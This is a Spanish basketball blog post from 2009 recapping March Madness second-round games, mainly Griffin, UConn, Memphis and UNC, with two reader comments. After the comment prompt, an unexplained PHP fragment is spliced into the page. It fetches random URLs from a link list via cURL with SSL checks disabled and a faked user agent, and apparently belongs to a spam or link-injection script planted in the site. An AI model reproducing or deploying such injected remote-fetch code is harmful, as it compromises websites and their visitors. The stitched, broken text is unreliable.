Todos los favoritos pasan ronda en la March Madness

22 de March de 2009 por txusma

Una vez eliminados la mayoría de los equipos más flojos de esta March Madness empiezan a llegar los partidos realmente interesantes. Pero hay una cosa que sigue igual y es la insultante superioridad de Blake Griffin. Michigan, conocedora de su debilidad, intentó parar a Griffin de cualquier manera, con jugadas que rozaron incluso el juego sucio y la ilegalidad, pero el ala-pívot, lejos de amedrentarse, anotó 33 puntos y recogió 17 rebotes. La atención que Griffin provoca en el resto de equipos hace que sus compañeros, sobretodo Willie Warren, gocen de muchos espacios y si están acertados Oklahoma se convierte en un equipo casi imparable. Ayer Warren consiguió 16 puntos, pero, ¿cuánto le debe a Blake Griffin?

Otro equipo que sigue con paso firme es UConn. Ayer arrasó a Texas A&M sin necesitar en ningún momento que su principal figura, Hasheem Thabeett, sudara la camiseta. En su lugar fueron AJ Price, posible segunda ronda del draft de 2009, con 27 puntos y Jeff Adrien, con 23, los que lideraron a los Huskies a una fácil victoria. Ahora los tocará sufrirlos a Purdue, que eliminó a Washington con JaJuan Johnson como estrella, ya que aparte de anotar 22 puntos, taponó los 2 últimos intentos de Washington para empatar el partido.

Memphis también pasó de ronda y lo hizo con más facilidad que en su partido inaugural. Esta vez el equipo de Tyreke Evans salió muy concentrado y terminó la primera parte con un acierto del 70% en tiros de campo, pasando por encima literalmente de Maryland. Evans fue el más destacado con 19 puntos y 5 asistencias.

Ayer volvió, tras 3 partidos de ausencia, Ty Lawson. El base de los Tar Heels cuajó una gran segunda parte anotando 21 de sus 23 puntos tras el descanso y liderando a su equipo a una victoria frente LSU que se decidió en los últimos minutos. Wayne Ellington (vigilémoslo de cerca de cara al próximo año) anotó también 23 puntos y Tyler Hansbrough, que recibió un golpe en el ojo, contribuyó con 15. Marcus Thorton, que podría ser un primera ronda, intentó plantar cara pero sus 25 puntos fueron a todas luces insuficientes. En la próxima ronda UNC se verá las caras con Gonzaga, que ganó con una canasta en el último segundo de Demetri Goodson, en el que habrá sido, sin duda, el momento de gloria de su vida. Gonzaga, aunque sin ningún super crack, dispone de un gran equipo con muchas alternativas.

Y en la región Este, Villanova y Duke se verán las caras en la próxima ronda tras eliminar a UCLA y Texas, respectivamente. Los Wildcats ganaron de 20 puntos a los Bruins y provocaron que después de 4 años de presencias consecutivas UCLA no llegue a la Final Four. Serio partido de Darren Collison que tendrá que demostrar algo más que defensa para enamorarnos. Duke lo tuvo más complicado pero su acierto en los minutos finales le otorgó la victoria con Gerald Henderson y Kyle Syngler como destacados. 24 puntos para el primero y 17 para el segundo.

Comenta

2 comentarios a esta entrada

  1. TheDeerHunter dice:
    #1

    Menudas patacas que tiene Griffin en la foto… aunque la cara de abobao no se la quita ni la leche que se va a dar

      Citar

  2. Viva_Dirk dice:
    #2

    Griffin es muy bueno y sabe jugar en equipo que es lo que le faltaba a Beasley tanto el año pasado como este.

    Ahora mismo veo a UConn y North Carolina por encima del resto y si tuviese que apostar por algun equipo sorpresa para la final four lo haria por Southern California.

    Hablaba Jose de Dajuan Blair y dudaba de su adaptación a la NBA, es posible pero creo que puede hacerlo muy muy bien, como Millsap.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>